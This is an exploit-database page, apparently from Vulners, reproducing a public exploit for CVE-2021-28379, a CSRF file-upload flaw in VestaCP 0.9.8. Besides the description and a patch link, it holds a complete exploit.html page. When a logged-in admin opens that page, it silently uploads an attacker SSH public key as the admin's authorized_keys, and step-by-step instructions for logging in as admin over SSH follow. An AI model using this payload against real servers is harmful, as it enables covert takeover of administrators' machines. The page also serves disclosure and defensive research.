Vulners
Lucene search
VestaCP 0.9.8 - File Upload CSRF Vulnerability
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | CVE-2021-28379 | 15 Mar 202111:28 | – | circl |
 | Vesta Control Panel 代码问题漏洞 | 15 Mar 202100:00 | – | cnnvd |
 | CVE-2021-28379 | 15 Mar 202105:56 | – | cve |
 | CVE-2021-28379 | 15 Mar 202105:56 | – | cvelist |
 | VestaCP 0.9.8 - File Upload CSRF | 17 Mar 202100:00 | – | exploitdb |
 | EUVD-2021-15061 | 7 Oct 202500:30 | – | euvd |
 | CVE-2021-28379 | 15 Mar 202106:15 | – | nvd |
 | VestaCP 0.9.8 Cross Site Request Forgery | 17 Mar 202100:00 | – | packetstorm |
 | Code injection | 15 Mar 202106:15 | – | prion |
 | CVE-2021-28379 | 9 Jan 202611:24 | – | redhatcve |
10
# Exploit Title: VestaCP 0.9.8 - File Upload CSRF
# Exploit Author: Fady Othman
# Vendor Homepage: https://vestacp.com/
# Software Link: https://github.com/myvesta/vesta
# Version: Vesta Control Panel (aka VestaCP) through 0.9.8-27 and myVesta through 0.9.8-26-39
# CVE ID: CVE-2021-28379
# Patch: https://github.com/myvesta/vesta/commit/3402071e950e76b79fa8672a1e09b70d3860f355
## Description
I found that the checks performed by the upload functionality are insufficient, the upload functionality is vulnerable to CSRF, in addition it allows uploading files and creating folders under "/tmp" and under the home folder (usually "/home/admin"), the later is the one that is important for this exploit to work.
I was able to use this to create a ".ssh" folder in the admin home and upload "authorized_keys" file which allowed me to access the server later as "admin" using SSH.
Since this relies on a *CSRF* the admin has to visit a link, please note that *sshd* is already installed by *VestaCP* when using the default installation script so no need to install it, also please note that files can be replaced so even if the admin has already added "authorized_keys" file, it will be replaced with the attacker's file.
Affected endpoint: "/upload/index.php", i.e. "/upload/index.php?dir=/home/admin/.ssh/"
## Steps to reproduce.
1. Install the latest version of VestaCP in your machine by following the instructions at https://vestacp.com/install/.
2. Login as the admin in Firefox, then open "exploit.html".
3. ssh into the machine using 'ssh -i id_rsa [email protected]', now you have access as admin.
# exploit.html
<html>
<head>
<script>
function exploit() {
var mystring = `ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCnXyu8AsFjbuE5YMUa74PrNkO9coGWnw59v/cSVMgOZVpx+UziT0BRFurhVkyujTCXdz6OlN4yFZjCVMbAgZ7/liNu9ecGSGNcUTC+Br5YawlG9QICEaJ/bK32+luKdM1c5ONbRby+ARFsC9+iZu6IkAPnSRntbNgDZpuej/cKfm85EnvdQPAijvs4+899w2+rGvhSQ0wH4l1KNlV1yVoAsg0PFYGDnbygGA5Eo4k9LHwa2Hsm5b2Q5GhqlEUCgYFOjScuORczwhctVtp4VWKXiFoMLJupNhot/OqUXkoNgE6UUd75XcLNGMBiyfLpfXO2u1sGsw5nTiKvNn+1YdC7AKHWBjxl3wDY8hMf/gcveV4Nh45mMUu0p6kptDdVhELeeys8euHiTWOk+FLCKkps9eLiyl8gQUfWcFVj0dgqYVJne2S1U33wnofRhj0fGWAJf14xHhwnTi7u58u+0U1NJchOTHAaeX1Swqk2J34Ny9GwD01a71DFIIcIbgcef6c= [email protected]`;
var fileContent = new Blob([mystring], {
type: 'text/plain'
});
myFormData = new FormData();
myFormData.append("files", fileContent, "authorized_keys");
fetch("https://localhost:8083/upload/index.php?dir=/home/admin/.ssh/", {
method: "post",
body: myFormData,
credentials: "include"
}); }
</script>
</head>
<body onload="exploit();">
</body>
</html>
# 0day.today [2021-09-28] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Mar 2021 00:00Current
0.2Low risk
Vulners AI Score0.2
CVSS 26.8
CVSS 3.18.8
EPSS0.0329